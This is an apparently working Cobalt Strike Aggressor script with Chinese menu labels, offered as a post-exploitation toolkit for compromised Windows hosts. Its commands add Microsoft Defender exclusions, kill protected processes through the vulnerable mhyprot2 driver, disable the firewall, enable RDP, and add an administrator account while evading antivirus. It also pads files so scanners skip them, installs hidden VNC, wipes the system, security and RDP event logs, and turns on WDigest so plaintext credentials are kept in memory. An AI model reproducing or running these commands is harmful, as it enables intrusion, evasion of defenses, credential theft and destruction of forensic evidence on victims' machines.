sub DefenderBypass{
    bshell($bid,"WMIC /Namespace:\\\\root\\Microsoft\\Windows\\Defender class MSFT_MpPreference call Add ExclusionPath=\'$3['path']\'");
    bpowershell($bid, "Add-MpPreference -ExclusionProcess \"$3['path']\\*.exe\"");
    bpowershell($bid, "Add-MpPreference -ExclusionProcess \"rundll32.exe\"");

}
sub MhyProtect{
    bupload($bid,script_resource("bin/mhyprot2.Sys"));

    #bupload_raw($bid,"c:\\windows\\temp\\mhyprot2.Sys",script_resource("bin/mhyprot2.Sys"));
    bexecute_assembly($bid, script_resource("bin/MhyProt2Drv.exe"), "$3['pid']");
    # brm($bid,"mhyprot2.Sys");

}
sub AutoDeleteMe{
    bupload($bid,script_resource("bin/AutoDeleteMe.bat"));
    bshell($bid, "AutoDeleteMe.bat $3['path']");
    bexit($bid);
}
sub Send {
        $username = replace(beacon_info($bid,"user"),' \*',"");
        $msg = $3['msg'];
        if(($username cmp "SYSTEM") == 0){
            show_error("Cannot send message with SYSTEM !");
            return;
        }
        bshell($bid,"msg $username \"$msg\"");
    }

sub Close_firewall{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "netsh firewall set opmode disable");
       return;
   }
   brun($1, "netsh advfirewall set allprofiles state off");
}
sub Open_rdp{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "wmic path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
       return;
   }
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1");
   brun($1, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
}
sub Adduser{
    bpowershell_import($bid, script_resource("bin/adduser.ps1"));
    bpowerpick($bid, "AddUser "."\"$3['username']\" "."\"$3['password']\"");
}
sub BiggerFile{
    bshell($bid, "fsutil file createnew c:\\windows\\temp\\myfile.tmp 104857600");
    btask($bid,"copy /b $3['path1'] \+ c:\\windows\\temp\\myfile.tmp $3['path2']")
    bshell($bid, "copy /b $3['path1'] \+ c:\\windows\\temp\\myfile.tmp $3['path2']");
    bshell($bid,"del c:\\windows\\temp\\myfile.tmp")
}
sub HVNC_install{
    bupload($bid,script_resource("bin/HVNC_Client.exe"));
    bmv($bid,"HVNC_Client.exe","c:\\windows\\temp\\HVNCC.exe");
    bexecute($bid, "c:\\windows\\temp\\HVNCC.exe $3['port']");
}

sub HVNC_link{
    
    exec(script_resource("bin/HVNC_Server.exe")." $3['ip'] $3['port']");
}
menu "小工具"{
    item "弹框"{
        $bid = $1['@'];
        $dialog = dialog("Chat", %(msg => "Hello: ".beacon_info($bid,"user"),bid => $bid), &Send);
        dialog_description($dialog, "弹窗");
        drow_text_big($dialog,"msg","Message:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
        }
    item "关闭防火墙"{
        if (!-isadmin $1['@']){
                show_error("权限不足");
                return;
        }
        Close_firewall($1);
    }
    item "开启RDP"{
        local('$bid');
        $bid = $1;
        if (!-isadmin $bid['@']){
            show_error("权限不足");
                return;
        }
        Open_rdp($1);
    }
    item "API添加用户" {
            $bid = $1;
            $add = dialog("AddUser", %(username => "admin", password => "admin123456", bid => $bid), &Adduser);
            dialog_description($add, "绕过杀软进行添加用户\n条件:拥有Administrator权限");

            drow_text($add, "username", "Username:");
            drow_text($add, "password", "Password:");
            dbutton_action($add, "Run");
            dialog_show($add);
        }
    item "Defender添加排除路径" {
        $bid = $1;
        $dialog = dialog("DefenderBypass", %(path => "c:\\windows\\temp",bid => $bid), &DefenderBypass);
        dialog_description($dialog, "Defender添加排除路径\n最后不要带\\");
        drow_text($dialog,"path","path:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }
    item "驱动K进程" {
        $bid = $1;
        $dialog = dialog("驱动K进程", %(pid => "",bid => $bid), &MhyProtect);
        dialog_description($dialog, "驱动K进程");
        drow_text($dialog,"pid","pid:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }
    item "自删除后下线"{
        $bid = $1;
        $dialog = dialog("自删除后下线", %(path => "你的Beacon程序路径"), &AutoDeleteMe);
        dialog_description($dialog, "自删除后下线,确保你输入的文件没有运行两个以上的进程，否则会无法删除");
        drow_text($dialog,"path","path:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }
    item "增大文件体积"{
        $bid = $1;
        $dialog = dialog("增大文件体积", %(path1 => "目标文件路径",path2 => "增大后输出文件路径"), &BiggerFile);
        dialog_description($dialog, "增大文件体积，使用了fsutil,也许需要UAC？默认增加大小为100Mb");
        drow_text($dialog,"path1","raw path:");
        drow_text($dialog,"path2","output path:");
        dbutton_action($dialog, "Send");
        dialog_show($dialog);
    }
    item "清理RDP登录记录"{
        $bid = $1;
        bshell($bid, "wevtutil cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational");
    }
    item "清理所有系统日志"{
        $bid = $1;
        bshell($bid, "wevtutil cl system");
        bshell($bid, "wevtutil cl application");
        bshell($bid, "wevtutil cl security");
        bshell($bid, "wevtutil cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational");
    }
    item "关闭保护开启密码记录"{
        $bid = $1;
        bshell($bid, "reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1");
    }
    
    menu "HVNC" {
       item "安装"{
            $bid = $1;
            $dialog = dialog("安装HVNC", %(port => 6667), &HVNC_install);
            dialog_description($dialog, "HVNC监听端口");
            drow_text($dialog,"port","port:");
            dbutton_action($dialog, "Send");
            dialog_show($dialog);
       }
       item "卸载"{
            $bid = $1;
            bshell($bid,"taskkill /f /im HVNCC.exe");
            brm($bid,"c:\\windows\\temp\\HVNCC.exe");
       }
       item "连接"{
            $bid = $1;
            $dialog = dialog("连接HVNC", %(ip => "127.0.0.1",port => 6667), &HVNC_link);
            dialog_description($dialog, "连接远程HVNC\n请确保你能直接访问到远程目标，或者使用cs自带socks代理功能挂上代理连接\n我们程序将使用HVNC_Server.exe连接目标，请将这个进程套上代理");
            drow_text($dialog,"ip","ip:");
            drow_text($dialog,"port","port:");
            dbutton_action($dialog, "Send");
            dialog_show($dialog);
       }
       
    }
    include(script_resource("modules/BOFRunPortable.cna"));
}

